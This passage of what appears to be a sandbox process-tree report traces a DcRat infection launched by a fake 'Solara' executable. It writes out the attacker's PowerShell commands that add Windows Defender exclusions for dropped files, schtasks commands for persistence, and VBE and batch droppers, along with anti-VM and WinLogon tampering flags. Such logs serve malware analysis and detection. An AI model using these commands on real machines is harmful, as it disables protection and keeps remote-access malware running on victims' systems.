                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
                                                                              7⤵
                                                                                PID:3216
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7440 /prefetch:1
                                                                                7⤵
                                                                                  PID:3372
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7224 /prefetch:8
                                                                                  7⤵
                                                                                    PID:4868
                                                                                • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
                                                                                  6⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:1292
                                                                              • C:\Users\Admin\AppData\Local\Temp\solara.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\solara.exe"
                                                                                5⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Modifies registry class
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:388
                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\oIWytMk.vbe"
                                                                                  6⤵
                                                                                  • Checks computer location settings
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2940
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\GPEuaUZk.bat" "
                                                                                    7⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2488
                                                                                    • C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                                                                      "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
                                                                                      8⤵
                                                                                      • Modifies WinLogon for persistence
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Drops file in Windows directory
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1244
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4668
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\System.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1008
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\appcompat\Programs\RuntimeBroker.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4188
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providerWebFont\fontdrvhost.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4388
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\wininit.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4312
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\dllhost.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2864
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\browserwinsvc.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3200
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5084
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\browserwinsvc.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3032
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\wscript.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4756
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\fontdrvhost.exe'
                                                                                        9⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3612
                                                                                      • C:\mswebFonthost\browserwinsvc.exe
                                                                                        "C:\mswebFonthost\browserwinsvc.exe"
                                                                                        9⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2540
                                                                            • C:\Users\Admin\AppData\Local\Temp\Solaradrive.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Solaradrive.exe"
                                                                              4⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Modifies registry class
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:3028
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\providerWebFont\rp9B7DqmQLcraqXwEvd0Obt7HxyhXRo2XNrbvC.vbe"
                                                                                5⤵
                                                                                • Checks computer location settings
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2392
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\providerWebFont\J8q9PLSI7w6bLMkKpRLxNzvjn.bat" "
                                                                                  6⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4472
                                                                                  • C:\providerWebFont\MsPortserver.exe
                                                                                    "C:\providerWebFont/MsPortserver.exe"
                                                                                    7⤵
                                                                                    • Modifies WinLogon for persistence
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2460
                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\emzs4c5f\emzs4c5f.cmdline"
                                                                                      8⤵
                                                                                        PID:4948
                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD021.tmp" "c:\Users\Default\PrintHood\CSC25DBD46D212C4D49B71E9AAAB5DEE547.TMP"
                                                                                          9⤵
                                                                                            PID:3376
                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wxkm0mmb\wxkm0mmb.cmdline"
                                                                                          8⤵
                                                                                          • Drops file in Windows directory
                                                                                          PID:3560
                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD179.tmp" "c:\Windows\appcompat\Programs\CSC14994D18C06347C195CB8530C416BFE.TMP"
                                                                                            9⤵
                                                                                              PID:2204
                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1zekfin2\1zekfin2.cmdline"
                                                                                            8⤵
                                                                                              PID:740
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD438.tmp" "c:\mswebFonthost\CSC8297D948221E4563A2C4E94EC10B241.TMP"
                                                                                                9⤵
                                                                                                  PID:380
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iq0rf13o\iq0rf13o.cmdline"
                                                                                                8⤵
                                                                                                  PID:1996
                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD61C.tmp" "c:\mswebFonthost\CSC27E4F26BD01B4C4E9219B7D8CA8C706A.TMP"
                                                                                                    9⤵
                                                                                                      PID:1640
                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xe2jibbo\xe2jibbo.cmdline"
                                                                                                    8⤵
                                                                                                      PID:4064
                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD68A.tmp" "c:\mswebFonthost\CSCF00588E8D7C4BC9B73848896C32C3E.TMP"
                                                                                                        9⤵
                                                                                                          PID:4012
                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mlya2mfw\mlya2mfw.cmdline"
                                                                                                        8⤵
                                                                                                          PID:3272
                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD6F7.tmp" "c:\mswebFonthost\CSC639A8571CF2F45AFA957FB7F3AC77CC9.TMP"
                                                                                                            9⤵
                                                                                                              PID:4288
                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4gr1ljke\4gr1ljke.cmdline"
                                                                                                            8⤵
                                                                                                              PID:2476
                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD793.tmp" "c:\Recovery\WindowsRE\CSC44DAA33A2154C17A41627106981B3E8.TMP"
                                                                                                                9⤵
                                                                                                                  PID:4516
                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tna2rxoc\tna2rxoc.cmdline"
                                                                                                                8⤵
                                                                                                                  PID:3104
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7F1.tmp" "c:\mswebFonthost\CSCB9393AB4F5547128C3B72B062E1799C.TMP"
                                                                                                                    9⤵
                                                                                                                      PID:4392
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v31y50cs\v31y50cs.cmdline"
                                                                                                                    8⤵
                                                                                                                    • Drops file in System32 directory
                                                                                                                    PID:2904
                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD86E.tmp" "c:\Windows\System32\CSCFBD68506DF90496CBF5290C4B8CE8FF3.TMP"
                                                                                                                      9⤵
                                                                                                                        PID:2316
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yk2oaInPqG.bat"
                                                                                                                      8⤵
                                                                                                                        PID:1252
                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                          chcp 65001
                                                                                                                          9⤵
                                                                                                                            PID:1196
                                                                                                                          • C:\Windows\system32\w32tm.exe
                                                                                                                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                            9⤵
                                                                                                                              PID:1212
                                                                                                                            • C:\Users\Admin\AppData\Local\SearchApp.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\SearchApp.exe"
                                                                                                                              9⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4420
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Solarascripts.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Solarascripts.exe"
                                                                                                                  3⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4428
                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\mswebFonthost\bDIv21uOAA97P6b9m4I8TmK.vbe"
                                                                                                                    4⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    PID:3936
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\mswebFonthost\f2crKrm9LrmP.bat" "
                                                                                                                      5⤵
                                                                                                                        PID:3604
                                                                                                                        • C:\mswebFonthost\Neo.exe
                                                                                                                          "C:\mswebFonthost/Neo.exe"
                                                                                                                          6⤵
                                                                                                                          • Modifies WinLogon for persistence
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          • Modifies registry class
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3916
                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qdb10rmk\qdb10rmk.cmdline"
                                                                                                                            7⤵
                                                                                                                              PID:4684
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49.tmp" "c:\Users\Admin\AppData\Local\CSC8CADC33083804811B46846D81EA117B8.TMP"
                                                                                                                                8⤵
                                                                                                                                  PID:2244
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\31h215sr\31h215sr.cmdline"
                                                                                                                                7⤵
                                                                                                                                  PID:832
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    8⤵
                                                                                                                                      PID:4064
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6.tmp" "c:\providerWebFont\CSC1C620B4134044B4B0488E82EA1F5065.TMP"
                                                                                                                                      8⤵
                                                                                                                                        PID:4816
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\InZ8ALZOsX.bat"
                                                                                                                                      7⤵
                                                                                                                                        PID:912
                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                          chcp 65001
                                                                                                                                          8⤵
                                                                                                                                            PID:2044
                                                                                                                                          • C:\Windows\system32\w32tm.exe
                                                                                                                                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                            8⤵
                                                                                                                                              PID:1772
                                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                              8⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                              PID:2744
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Users\Default\PrintHood\System.exe'" /f
                                                                                                                                1⤵
                                                                                                                                • DcRat
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:4448
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\System.exe'" /rl HIGHEST /f
                                                                                                                                1⤵
                                                                                                                                • DcRat
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:872
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Users\Default\PrintHood\System.exe'" /rl HIGHEST /f
                                                                                                                                1⤵
                                                                                                                                • DcRat
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:3828
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\appcompat\Programs\RuntimeBroker.exe'" /f
                                                                                                                                1⤵
                                                                                                                                • DcRat
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:1648
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\appcompat\Programs\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                1⤵
                                                                                                                                • DcRat
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:4476
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\appcompat\Programs\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                1⤵
                                                                                                                                • DcRat
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:3504
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\providerWebFont\fontdrvhost.exe'" /f
                                                                                                                                1⤵
                                                                                                                                • DcRat
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:1892
                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                1⤵
                                                                                                                                • Blocklisted process makes network request
                                                                                                                                • Enumerates connected drives
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2188
                                                                                                                                • C:\Windows\System32\MsiExec.exe
                                                                                                                                  C:\Windows\System32\MsiExec.exe -Embedding 8410CE6ABFBE8C75011AA3AD7E19E5DE
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:2784
                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 0D132079E1F9A5AEE67A98609BDB7A58
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:3192
                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 72D920D3E3E306A6079D0C7504E99EB7 E Global\MSI0000
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:228
                                                                                                                                  • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                    "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
                                                                                                                                    3⤵
                                                                                                                                      PID:4520
                                                                                                                                      • C:\Windows\System32\wevtutil.exe
                                                                                                                                        "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
                                                                                                                                        4⤵
                                                                                                                                          PID:628
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\providerWebFont\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:4972
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\providerWebFont\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:1640
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\mswebFonthost\wininit.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:1816
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\mswebFonthost\wininit.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:1080
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\mswebFonthost\wininit.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:2128
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\mswebFonthost\dllhost.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:1512
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\mswebFonthost\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    PID:1652
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\mswebFonthost\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:2156
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "browserwinsvcb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\browserwinsvc.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:4672
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "browserwinsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\browserwinsvc.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3180
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "browserwinsvcb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\browserwinsvc.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:452
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:1128
                                                                                                                                  • C:\Windows\system32\schtasks.exe
